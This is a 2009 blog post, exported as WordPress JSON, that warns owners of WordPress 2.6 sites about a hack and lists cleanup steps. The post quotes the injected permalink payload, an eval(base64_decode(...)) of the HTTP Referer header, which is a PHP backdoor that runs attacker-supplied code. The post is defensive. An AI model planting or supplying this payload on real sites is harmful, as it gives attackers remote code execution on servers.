{"id":832,"date":"2009-09-04T23:00:40","date_gmt":"2009-09-04T15:00:40","guid":{"rendered":"http:\/\/www.whoisandrewwee.com\/?p=832"},"modified":"2009-09-05T07:19:16","modified_gmt":"2009-09-04T23:19:16","slug":"wordpress-26-permalink-problem","status":"publish","type":"post","link":"http:\/\/whoisandrewwee.com\/blogging\/wordpress-26-permalink-problem\/","title":{"rendered":"URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps"},"content":{"rendered":"<p>I checked my blog and the URLs looked malformed, with the following structure: <a href=\"http:\/\/www.whoisandrewwee.com\/2009\/09\/03\/unlocking-unconventional-traffic-sources-for-affiliate-campaigns\/%&#038;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D)\" rel=\"nofollow\">http:\/\/www.whoisandrewwee.com\/2009\/09\/03\/unlocking-unconventional-traffic-sources-for-affiliate-campaigns\/%&#038;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D)<\/a>)%7D%7D|.+)&amp;%\/#comment-506929<\/p>\n<p>If you notice something similar or weird with your WordPress blog, you might want to take the following steps:<\/p>\n<ul>\n<li>Check the &#8220;users&#8221; tab from the WP admin interface<\/li>\n<li>Remove any unfamiliar users, esp those marked as &#8220;administrator&#8221;<\/li>\n<li>To prevent users from registering, I&#8217;d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)<\/li>\n<li>Check all of WordPress&#8217; PHP scripts, remove global &#8220;execute&#8221; privileges<\/li>\n<\/ul>\n<p>Once you&#8217;ve secured the perimeter, look at the &#8220;Settings&#8221; and &#8220;permalinks&#8221; tab.<\/p>\n<p>If you see some weird stuff like &#8220;%&amp;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&amp;%\/#comment-506929&#8221;, you&#8217;d want to clear that, and replace it with your original permalink structure, or look it up on the <a title=\"wordpress codex\" href=\"http:\/\/codex.wordpress.org\/Using_Permalinks\" target=\"_blank\">WordPress codex<\/a>.<\/p>\n<p>You can also check out this <a title=\"wordpress problem\" href=\"http:\/\/www.journeyetc.com\/2009\/09\/04\/wordpress-permalink-rss-problems\/\" target=\"_blank\">other blog post<\/a> for more details.<\/p>\n<p>Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it&#8217;s affecting version 2.8.x.<\/p>\n<p><strong>UPDATE<\/strong>: Matt Mullenweg from the WordPress development team has <a title=\"matt mullenweg\" href=\"http:\/\/wordpress.org\/development\/2009\/08\/2-8-4-security-release\/\" target=\"_blank\">posted<\/a> about the security issues if you&#8217;re using an older version of WordPress. Here&#8217;s a WP support forum write up about <a title=\"wp security problem\" href=\"http:\/\/wordpress.org\/development\/2009\/08\/2-8-4-security-release\/\" target=\"_blank\">what might be happening<\/a>.<\/p>\n<p>You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins\/themes might not work if the developer hasn&#8217;t updated the plugin for compliance with the newest version.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I checked my blog and the URLs looked malformed, with the following structure: http:\/\/www.whoisandrewwee.com\/2009\/09\/03\/unlocking-unconventional-traffic-sources-for-affiliate-campaigns\/%&#038;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&amp;%\/#comment-506929 If you notice something similar or weird with your WordPress blog, you might want to take the following steps: Check the &#8220;users&#8221; tab from the WP admin interface Remove any unfamiliar users, esp those marked as &#8220;administrator&#8221; To prevent users from [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[24],"tags":[1760,1759],"_links":{"self":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts\/832"}],"collection":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/comments?post=832"}],"version-history":[{"count":0,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/posts\/832\/revisions"}],"wp:attachment":[{"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/media?parent=832"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/categories?post=832"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/whoisandrewwee.com\/wp-json\/wp\/v2\/tags?post=832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}